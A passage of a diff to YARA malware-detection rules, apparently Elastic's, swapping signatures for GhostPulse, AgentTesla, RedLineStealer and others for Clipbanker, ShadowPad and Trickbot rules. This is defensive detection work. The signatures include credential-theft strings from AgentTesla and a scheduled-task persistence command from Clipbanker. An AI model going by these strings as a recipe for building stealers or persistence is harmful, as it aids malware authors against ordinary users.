"https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "4ef78d436a153ed751a8483c1e43ec2ba053dedfa0da2780fded42012d3042c1" + id = "26124fe4-f2a1-4fc9-8155-585b581476de" + date = "2022-03-31" + modified = "2022-04-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Tofsee.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494" + logic_hash = "e765953dec7c7b2a1fbebf92c2fff46453c8258722ad5ca92ba4c7526a8b0c66" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "18aed348ba64bee842fb6af3b3220e108052a67f49724cf34ba52c8ec7c15cac" + fingerprint = "dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -98460,28 +98768,29 @@ rule ELASTIC_Windows_Trojan_Ghostpulse_3Fe1D02D : FILE MEMORY os = "windows" strings: - $a = { 48 89 5C 24 08 48 89 7C 24 10 8B DA 45 33 D2 48 8B F9 41 2B D9 74 50 4C 8B D9 4C 2B C1 0F 1F 00 33 C9 } + $a = { 55 8B EC 8B 45 ?? 57 8B 7D ?? B1 01 85 FF 74 ?? 56 8B 75 ?? 2B F0 8A 14 06 32 55 ?? 88 10 8A D1 02 55 ?? F6 D9 00 55 ?? 40 4F 75 ?? 5E 8B 45 ?? 5F 5D C3 } + $b = { 8B 44 24 ?? 53 8A 18 84 DB 74 ?? 8B D0 2B 54 24 ?? 8B 4C 24 ?? 84 DB 74 ?? 8A 19 84 DB 74 ?? 38 1C 0A 75 ?? 41 80 3C 0A 00 75 ?? 80 39 00 74 ?? 40 8A 18 42 84 DB 75 ?? 33 C0 5B C3 } condition: - all of them + any of them } -rule ELASTIC_Windows_Trojan_Ghostpulse_3673D337 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Clipbanker_7Efaef9F : FILE MEMORY { meta: - description = "Detects Windows Trojan Ghostpulse (Windows.Trojan.GhostPulse)" + description = "Detects Windows Trojan Clipbanker (Windows.Trojan.Clipbanker)" author = "Elastic Security" - id = "3673d337-218b-4ea8-93f5-ecbc6fe51885" - date = "2023-12-11" - modified = "2024-01-12" - reference = "https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_GhostPulse.yar#L43-L63" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3013ba32838f6d97d7d75e25394f9611b1c5def94d93588f0a05c90b25b7d6d5" - logic_hash = "a92815f27533338e17afd5ebdbe82e382636fb81167a82d1b613c0dccc5b7ed3" + id = "7efaef9f-51cd-4fea-a48d-fa9d39cb735e" + date = "2022-02-28" + modified = "2022-04-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Clipbanker.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "02b06acb113c31f5a2ac9c99f9614e0fab0f78afc5ae872e46bae139c2c9b1f6" + logic_hash = "fa547d7c1623b332ef306672dd2293b44016d9974c1a3ec4b15e5ae0483ff879" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0b46a0e04ab2ca2760b2ace397a09b681bc6c0da5581c3f0f5cdb1a60f307a15" + fingerprint = "fe0ec44f8707cd03f845dbea4ff5bb1b699db1b69b75f0365168a75cc8bb68a3" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -98489,29 +98798,32 @@ rule ELASTIC_Windows_Trojan_Ghostpulse_3673D337 : FILE MEMORY os = "windows" strings: - $IDAT_parser_x86 = { 80 F9 3F 75 ?? 38 54 1E 02 74 ?? 80 FA 3F 75 ?? 38 6C 1E 03 74 ?? 80 FD 3F 75 ?? 8A 74 24 04 38 74 1E 04 } - $IDAT_parser_x64 = { 80 FB 3F 0F 94 44 24 27 3C 3F 0F 94 44 24 30 40 80 FF 3F 0F 94 44 24 31 41 80 FD 3F 0F 94 44 24 32 41 80 FC 3F 0F 94 44 24 33 } + $a1 = "C:\\Users\\youar\\Desktop\\Allcome\\Source code\\Build\\Release\\Build.pdb" ascii fullword + $b1 = "https://steamcommunity.com/tradeoffer" ascii fullword + $b2 = "/Create /tn NvTmRep_CrashReport3_{B2FE1952-0186} /sc MINUTE /tr %s" ascii fullword + $b3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0" ascii fullword + $b4 = "ProcessHacker.exe" ascii fullword condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Ghostpulse_8Ae8310B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Clipbanker_B60A50B8 : FILE MEMORY { meta: - description = "Detects Windows Trojan Ghostpulse (Windows.Trojan.GhostPulse)" + description = "Detects Windows Trojan Clipbanker (Windows.Trojan.Clipbanker)" author = "Elastic Security" - id = "8ae8310b-4ead-4b5c-be73-7db365470891" - date = "2024-05-27" - modified = "2024-06-12" + id = "b60a50b8-91a4-49a7-bd05-fa4cc1dee1ac" + date = "2022-02-28" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_GhostPulse.yar#L65-L84" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5b64f91b41a7390d89cd3b1fccf02b08b18b7fed17a43b0bfac63d75dc0df083" - logic_hash = "b3873a3c728e98d65984033620c0ac8ee93be21db5b6d9bd4665b9f7d0d759fa" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Clipbanker.yar#L25-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "02b06acb113c31f5a2ac9c99f9614e0fab0f78afc5ae872e46bae139c2c9b1f6" + logic_hash = "fe585ab7efbc3b500ea23d1c164bc79ded658001e53fc71721e435ed7579182a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "61213fd4ce9ddebdc7de8e6b23827347af3cbddd61254f95917e9af6b8a2b7b2" + fingerprint = "097bb88d8482a4915c19affc82750c7ee225b89f2611ea654cfc3c044aae0738" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -98519,29 +98831,28 @@ rule ELASTIC_Windows_Trojan_Ghostpulse_8Ae8310B : FILE MEMORY os = "windows" strings: - $a = { 48 8B 84 24 ?? 0D 00 00 8B 40 14 0F BA E8 09 48 8B 8C 24 ?? 0D 00 00 89 41 14 48 8B 84 24 ?? 0D 00 00 48 8B 8C 24 ?? 05 00 00 48 89 88 C0 ?? 00 00 } - $b = { BA C8 90 F0 B2 48 8B ?? ?? ?? E8 ?? ?? ?? 00 48 89 ?? ?? ?? 07 00 00 BA 9C 6C DA DC 48 8B ?? ?? ?? E8 ?? ?? ?? 00 48 89 ?? ?? ?? 07 00 00 BA 8D 20 4A A1 48 8B ?? ?? ?? E8 ?? ?? ?? 00 48 89 ?? ?? ?? 07 00 00 BA D4 7C 1A A8 } + $a1 = { 40 66 0F F8 C1 0F 11 40 A0 0F 10 84 15 08 FF FF FF 83 C2 40 } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Ghostpulse_9E22C56D : FILE MEMORY +rule ELASTIC_Windows_Trojan_Clipbanker_F9F9E79D : FILE MEMORY { meta: - description = "Detects Windows Trojan Ghostpulse (Windows.Trojan.GhostPulse)" + description = "Detects Windows Trojan Clipbanker (Windows.Trojan.Clipbanker)" author = "Elastic Security" - id = "9e22c56d-91bf-4259-8b60-aa7323b5e8f9" - date = "2024-07-21" - modified = "2024-07-26" + id = "f9f9e79d-ce71-4b6c-83e0-ac6e06252c25" + date = "2022-04-23" + modified = "2022-06-09" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_GhostPulse.yar#L86-L106" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "349b4dfa1e93144b010affba926663264288a5cfcb7b305320f466b2551b93df" - logic_hash = "5dbd0d6a936a73e933181017c67c36fde7576b47643ec00848f7b58170bd9c6b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Clipbanker.yar#L45-L63" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c" + logic_hash = "a71d75719133e8b84956ec002cb31f82386ef711fa2af79d204d176492cd354b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5e9883ad58fee79960a6e5e3c266885c6dc72057a16f4ea0e371088571e9b663" + fingerprint = "ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -98549,30 +98860,28 @@ rule ELASTIC_Windows_Trojan_Ghostpulse_9E22C56D : FILE MEMORY os = "windows" strings: - $a = { C7 44 24 28 80 3C 36 FE C7 44 24 2C FF FF FF FF 53 6A 00 } - $b = { 80 7C 24 04 3F ?? ?? 8A 74 24 08 38 74 1E 05 8A 6C 24 10 ?? ?? 80 7C 24 08 3F } - $c = { 89 41 5C 8B 44 24 ?? 8B 80 04 01 00 00 89 44 24 ?? 8B 42 3C 8B 44 02 78 8B 4C 02 20 01 D1 89 4C 24 ?? 8B 4C 02 1C 89 4C 24 ?? 8B 44 02 24 89 44 } + $a1 = { 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83 } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Agenttesla_D3Ac2B2F : FILE MEMORY +rule ELASTIC_Windows_Trojan_Clipbanker_787B130B : FILE MEMORY { meta: - description = "Detects Windows Trojan Agenttesla (Windows.Trojan.AgentTesla)" + description = "Detects Windows Trojan Clipbanker (Windows.Trojan.Clipbanker)" author = "Elastic Security" - id = "d3ac2b2f-14fc-4851-8a57-41032e386aeb" - date = "2021-03-22" - modified = "2022-06-20" - reference = "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_AgentTesla.yar#L1-L58" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4" - logic_hash = "9c13a99107593d476de1522ced10aa43d34535b844e8c3ae871b22358137c926" + id = "787b130b-6382-42f0-8822-fce457fa940d" + date = "2022-04-24" + modified = "2022-06-09" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Clipbanker.yar#L65-L87" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c" + logic_hash = "88783bde7014853f6556c6e7ee2dfd5cd5fcbfb4523ed158b4287e2bfba409f1" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc" + fingerprint = "15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -98580,66 +98889,33 @@ rule ELASTIC_Windows_Trojan_Agenttesla_D3Ac2B2F : FILE MEMORY os = "windows" strings: - $a1 = "GetMozillaFromLogins" ascii fullword - $a2 = "AccountConfiguration+username" wide fullword - $a3 = "MailAccountConfiguration" ascii fullword - $a4 = "KillTorProcess" ascii fullword - $a5 = "SmtpAccountConfiguration" ascii fullword - $a6 = "GetMozillaFromSQLite" ascii fullword - $a7 = "Proxy-Agent: HToS5x" wide fullword - $a8 = "set_BindingAccountConfiguration" ascii fullword - $a9 = "doUsernamePasswordAuth" ascii fullword - $a10 = "SafariDecryptor" ascii fullword - $a11 = "get_securityProfile" ascii fullword - $a12 = "get_useSeparateFolderTree" ascii fullword - $a13 = "get_DnsResolver" ascii fullword - $a14 = "get_archivingScope" ascii fullword - $a15 = "get_providerName" ascii fullword - $a16 = "get_ClipboardHook" ascii fullword - $a17 = "get_priority" ascii fullword - $a18 = "get_advancedParameters" ascii fullword - $a19 = "get_disabledByRestriction" ascii fullword - $a20 = "get_LastAccessed" ascii fullword - $a21 = "get_avatarType" ascii fullword - $a22 = "get_signaturePresets" ascii fullword - $a23 = "get_enableLog" ascii fullword - $a24 = "TelegramLog" ascii fullword - $a25 = "generateKeyV75" ascii fullword - $a26 = "set_accountName" ascii fullword - $a27 = "set_InternalServerPort" ascii fullword - $a28 = "set_bindingConfigurationUID" ascii fullword - $a29 = "set_IdnAddress" ascii fullword - $a30 = "set_GuidMasterKey" ascii fullword - $a31 = "set_username" ascii fullword - $a32 = "set_version" ascii fullword - $a33 = "get_Clipboard" ascii fullword - $a34 = "get_Keyboard" ascii fullword - $a35 = "get_ShiftKeyDown" ascii fullword - $a36 = "get_AltKeyDown" ascii fullword - $a37 = "get_Password" ascii fullword - $a38 = "get_PasswordHash" ascii fullword - $a39 = "get_DefaultCredentials" ascii fullword + $mutex_setup = { 55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? } + $new_line_check = { 0F B7 C2 89 45 ?? 0F B7 C2 83 F8 0A 74 ?? BA 0D 0A 00 00 66 3B C2 74 ?? 83 F8 0D 74 ?? 83 F8 20 74 ?? 83 F8 09 74 ?? } + $regex1 = { 0F B7 C2 89 45 ?? 0F B7 C2 83 F8 0A 74 ?? BA 0D 0A 00 00 66 3B C2 74 ?? 83 F8 0D 74 ?? 83 F8 20 74 ?? 83 F8 09 74 ?? } + $regex2 = { 6A 34 59 66 39 0E 75 ?? 0F B7 46 ?? 6A 30 5A 83 F8 41 74 ?? 83 F8 42 74 ?? 66 3B C2 74 ?? 83 F8 31 74 ?? 83 F8 32 74 ?? 83 F8 33 74 ?? 66 3B C1 74 ?? 83 F8 35 74 ?? 83 F8 36 74 ?? 83 F8 37 74 ?? 83 F8 38 74 ?? 83 F8 39 75 ?? } + $regex3 = { 56 8B F1 56 FF 15 ?? ?? ?? ?? 83 F8 5F 0F 85 ?? ?? ?? ?? 6A 38 59 66 39 0E 75 ?? 0F B7 46 ?? 6A 30 5A 83 F8 41 74 ?? 83 F8 42 74 ?? 66 3B C2 74 ?? 83 F8 31 74 ?? 83 F8 32 74 ?? 83 F8 33 74 ?? 83 F8 34 74 ?? 83 F8 35 74 ?? 83 F8 36 74 ?? 83 F8 37 74 ?? 66 3B C1 74 ?? 83 F8 39 75 ?? } condition: - 8 of ($a*) + any of them } -rule ELASTIC_Windows_Trojan_Agenttesla_E577E17E : FILE MEMORY +rule ELASTIC_Windows_Trojan_Shadowpad_Be71209D : FILE MEMORY { meta: - description = "Detects Windows Trojan Agenttesla (Windows.Trojan.AgentTesla)" + description = "Target ShadowPad loader" author = "Elastic Security" - id = "e577e17e-5c42-4431-8c2d-0c1153128226" - date = "2022-03-11" - modified = "2022-04-12" - reference = "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_AgentTesla.yar#L60-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6" - logic_hash = "84c5f1096735cee0f0f4ad41a81286c0a60dc17c276f23568b855271d996c8a2" + id = "be71209d-b1c0-4922-87ae-47d0930d8755" + date = "2023-01-31" + modified = "2023-02-01" + reference = "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_ShadowPad.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "452b08d6d2aa673fb6ccc4af6cebdcb12b5df8722f4d70d1c3491479e7b39c05" + logic_hash = "24e035bbcd5d44877e6e582a995d0035ad26c53e832c34b0c8a3836cb1a11637" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d" + fingerprint = "629f1502ce9f429ba6d497b8f2b0b35e57ca928a764ee6f3cb43521bfa6b5af4" + threat_name = "Windows.Trojan.ShadowPad" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -98647,57 +98923,62 @@ rule ELASTIC_Windows_Trojan_Agenttesla_E577E17E : FILE MEMORY os = "windows" strings: - $a = { 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07 } + $a1 = "{%8.8x-%4.4x-%4.4x-%8.8x%8.8x}" condition: all of them } -rule ELASTIC_Windows_Trojan_Agenttesla_F2A90D14 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Shadowpad_0D899241 : MEMORY { meta: - description = "Detects Windows Trojan Agenttesla (Windows.Trojan.AgentTesla)" + description = "Target ShadowPad payload" author = "Elastic Security" - id = "f2a90d14-7212-41a5-a2cd-a6a6dedce96e" - date = "2022-03-11" - modified = "2022-04-12" - reference = "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_AgentTesla.yar#L81-L100" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6" - logic_hash = "3f39b773f2b1524b05d3c1d9aa1fb54594ec9003d2e9da342b6d17ba885f5a03" + id = "0d899241-6ef8-4524-a728-4ed53e4d2cec" + date = "2023-01-31" + modified = "2023-02-01" + reference = "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_ShadowPad.yar#L23-L48" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "cb3a425565b854f7b892e6ebfb3734c92418c83cd590fc1ee9506bcf4d8e02ea" + logic_hash = "57385e149c6419aed2dcd3ecbbe26d8598918395a6480dd5cdb799ce7328901a" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6" + tags = "MEMORY" + fingerprint = "7070eb3608c2c39804ccad4a05e4de12ec4eb47388589ef72c723b353b920a68" + threat_name = "Windows.Trojan.ShadowPad" severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "memory" license = "Elastic License v2" os = "windows" strings: - $a = { 0B FE 01 2C 0B 07 16 7E 08 00 00 04 A2 1F 0C 0C 00 08 1F 09 FE 01 } + $a1 = "hH#whH#w" fullword + $a2 = "Yuv~YuvsYuvhYuv]YuvRYuvGYuv1:tvJ=+@A?-BAA*DAC*FAE*HFG+JAI-LAK*NAM*PAO*RFQ+TAS-VAU9" condition: all of them } -rule ELASTIC_Linux_Trojan_Dropperl_733C0330 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_01365E46 : FILE MEMORY { meta: - description = "Detects Linux Trojan Dropperl (Linux.Trojan.Dropperl)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "733c0330-3163-48f3-a780-49be80a3387f" - date = "2021-04-06" - modified = "2021-09-16" + id = "01365e46-c769-4c6e-913a-4d1e42948af2" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Dropperl.yar#L101-L119" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b303f241a2687dba8d7b4987b7a46b5569bd2272e2da3e0c5e597b342d4561b6" - logic_hash = "37bf7777e26e556f09b8cb0e7e3c8425226a6412c3bed0d95fdab7229b6f4815" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172" + logic_hash = "4d61de2cb37e12f62326c1717f6ed44554f5d2aa7ede6033d0c988e5e64df54d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ee233c875dd3879b4973953a1f2074cd77abf86382019eeb72da069e1fd03e1c" + fingerprint = "98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E8 A0 FB FF FF 83 7D DC 00 79 0A B8 ?? ?? 60 00 } + $a = { 8B 43 28 4C 8B 53 18 4C 8B 5B 10 4C 8B 03 4C 8B 4B 08 89 44 24 38 48 89 4C 24 30 4C } condition: all of them } -rule ELASTIC_Linux_Trojan_Dropperl_39F4Cd0D : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_06Fd4Ac4 : FILE MEMORY { meta: - description = "Detects Linux Trojan Dropperl (Linux.Trojan.Dropperl)" + description = "Identifies Trickbot unpacker" author = "Elastic Security" - id = "39f4cd0d-4261-4d62-a527-f403edadbd0c" - date = "2021-04-06" - modified = "2021-09-16" + id = "06fd4ac4-1155-4068-ae63-4d83db2bd942" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Dropperl.yar#L121-L139" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c08e1347877dc77ad73c1e017f928c69c8c78a0e3c16ac5455668d2ad22500f3" - logic_hash = "5b61f54604b110d2c8efaf1782a2e520baac96c6d3e8d1eda0877475c504bf89" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "bde387f1e22d1399fb99f6d41732a37635d8e90f29626f2995914a073a7cac89" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e1cdd678a1f46a3c6d26d53dd96ba6c6a45f97e743765c534f644af7c6450f8e" + fingerprint = "ece49004ed1d27ef92b3b1ec040d06e90687d4ac5a89451e2ae487d92cb24ddd" + threat_name = "Windows.Trojan.Trickbot" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E8 ?? FA FF FF 83 7D D4 00 79 0A B8 ?? ?? 60 00 } + $a = { 5F 33 C0 68 ?? ?? 00 00 59 50 E2 FD 8B C7 57 8B EC 05 ?? ?? ?? 00 89 45 04 } condition: all of them } -rule ELASTIC_Linux_Hacktool_Prochide_7333221A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_Ce4305D1 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Prochide (Linux.Hacktool.Prochide)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "7333221a-b3dc-4b26-8ec7-7e4f5405e228" - date = "2021-04-06" - modified = "2021-09-16" + id = "ce4305d1-8a6f-4797-afaf-57e88f3d38e6" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Prochide.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fad956a6a38abac8a8a0f14cc50f473ec6fc1c9fd204e235b89523183931090b" - logic_hash = "413f19744240eae0a87d56da1e524e2afa0fe0ec385bd9369218713b13a93495" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L41-L58" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "c547114475383e5d84f6b8cb72585ddd5778ae3afa491deddeef8a5ec56be1b5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e3aa99d48a8554dfaf9f7d947170e6e169b99bf5b6347d4832181e80cc2845cf" + fingerprint = "ae606e758b02ccf2a9a313aebb10773961121f79a94c447e745289ee045cf4ee" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { FF FF 83 BD 9C FC FF FF FF 75 14 BF 7F 22 40 00 } + $a = { F9 8B 45 F4 89 5D E4 85 D2 74 39 83 C0 02 03 C6 89 45 F4 8B } condition: all of them } -rule ELASTIC_Windows_Trojan_Redlinestealer_17Ee6A17 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_1E56Fad7 : FILE MEMORY { meta: - description = "Detects Windows Trojan Redlinestealer (Windows.Trojan.RedLineStealer)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "17ee6a17-161e-454a-baf1-2734995c82cd" - date = "2021-06-12" + id = "1e56fad7-383f-4ee0-9f8f-a0b3dcceb691" + date = "2021-03-28" modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_RedLineStealer.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "497bc53c1c75003fe4ae3199b0ff656c085f21dffa71d00d7a3a33abce1a3382" - logic_hash = "0c868d0673c01e2c115d6822c34c877db77265251167f3a890a448a1de5c6a2d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L60-L77" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "815b37804f79fb4607e6b84294882d818233c3df13aececb3d341244900a2e44" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a1f75937e83f72f61e027a1045374d3bd17cd387b223a6909b9aed52d2bc2580" + fingerprint = "a0916134f47df384bbdacff994970f60d3613baa03c0a581b7d1dd476af3121b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99030,36 +99349,27 @@ rule ELASTIC_Windows_Trojan_Redlinestealer_17Ee6A17 : FILE MEMORY os = "windows" strings: - $a1 = "RedLine.Logic.SQLite" ascii fullword - $a2 = "RedLine.Reburn.Data.Browsers.Gecko" ascii fullword - $a3 = "RedLine.Client.Models.Gecko" ascii fullword - $b1 = "SELECT * FROM Win32_Process Where SessionId='{0}'" wide fullword - $b2 = 